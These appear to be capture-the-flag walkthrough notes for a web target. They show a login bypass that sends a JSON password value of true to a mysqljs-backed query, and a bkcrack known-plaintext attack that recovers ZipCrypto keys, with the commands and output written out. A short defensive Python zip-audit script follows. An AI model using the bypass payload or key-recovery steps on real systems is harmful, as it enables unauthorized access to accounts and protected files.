Spent about an hour on Cookie, hoping to bypass authentication somehow.
Then hacktricks.xyz gave me a hint.
Still took some time to bypass it.
00:43 Bypass authentication
https://book.hacktricks.xyz/pentesting-web/login-bypass
Finding an Authorization Bypass on my Own Website
The mysqljs parameterized query parser handles objects as column name and key, leading to alterations of the query.
After reading the two pages above, I first tried
{
"password":1
}
But it did not work. It should be bool true.
{
"password":true
}
01:00 Crack zip password
Check details of zip file.
unzip -l *.zip
7z l -slt *.zip
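As an added example (not code from the original post), the same check done with Python's zipfile module. It reports for each entry whether it is protected with legacy ZipCrypto, the scheme the known-plaintext attack below applies to, or with AES, and whether a file you already hold has the same CRC. The names `audit_zip` and `build_sample` and the sample contents are assumptions of this example; the sample archive is constructed in memory and only has the encryption flag set.

```python
import io
import zipfile
import zlib

AES_METHOD = 99  # WinZip AES entries are stored with compression method 99
# Constructed stand-in for a file the auditor already holds in plaintext.
SAMPLE_LOGOUT = b"# ~/.bash_logout (constructed sample content)\nclear\n"


def build_sample(encrypted=True):
    """Constructed archive; 'encrypted' only sets the flag bit, the data stays plain."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(".bash_logout", SAMPLE_LOGOUT)
        zf.writestr("notes.txt", b"constructed secret\n")
    raw = bytearray(buf.getvalue())
    pos = raw.find(b"PK\x01\x02")  # central directory file headers
    while encrypted and pos != -1:
        raw[pos + 8] |= 0x01  # general purpose flag, bit 0 = encrypted
        pos = raw.find(b"PK\x01\x02", pos + 4)
    return bytes(raw)


def audit_zip(data, known_files=None):
    """Per entry: protection scheme, CRC, and which held files share that CRC."""
    known = {label: zlib.crc32(blob) & 0xFFFFFFFF
             for label, blob in (known_files or {}).items()}
    report = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.flag_bits & 0x1:
                scheme = "none"
            elif info.compress_type == AES_METHOD:
                scheme = "AES"
            else:
                scheme = "ZipCrypto"  # legacy PKZIP stream cipher
            report.append({
                "name": info.filename,
                "scheme": scheme,
                "crc": f"{info.CRC:08x}",
                "size": info.file_size,
                "known_match": sorted(l for l, c in known.items() if c == info.CRC),
            })
    return report


if __name__ == "__main__":
    for row in audit_zip(build_sample(), {"local .bash_logout": SAMPLE_LOGOUT}):
        print(row)
```

Any entry reported as ZipCrypto with a non-empty `known_match` should be treated as unprotected; archives meant to stay confidential need AES encryption instead.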
01:07 Plain text attack
How I Cracked CONTI Ransomware Group’s Leaked Source Code ZIP File
Leaker posted full zip with password
Installing bkcrack
wget https://github.com/kimci86/bkcrack/releases/download/v1.5.0/bkcrack-1.5.0-Linux.tar.gz
$ /opt/bkcrack-1.5.0-Linux/bkcrack -C uploaded-file-3422.zip -c .bash_logout -P 2nd.zip -p .bash_logout
bkcrack 1.5.0 - 2022-07-07
[03:25:40] Z reduction using 151 bytes of known plaintext
100.0 % (151 / 151)
[03:25:41] Attack on 56903 Z values at index 6
Keys: 7b549874 ebc25ec5 7e465e18
75.5 % (42942 / 56903)
[03:41:51] Keys
7b549874 ebc25ec5 7e465e18
$ /opt/bkcrack-1.5.0-Linux/bkcrack -C uploaded-file-3422.zip -k 7b549874 ebc25ec5 7e465e18 -U uploaded-file-3422-pass.zip password
bkcrack 1.5.0 - 2022-07-07
[03:52:32] Writing unlocked archive uploaded-file-3422-pass.zip with password "password"
100.0 % (9 / 9)
Wrote unlocked archive.
02:07 Read Laravel code
Laravel - The PHP Framework For Web Artisans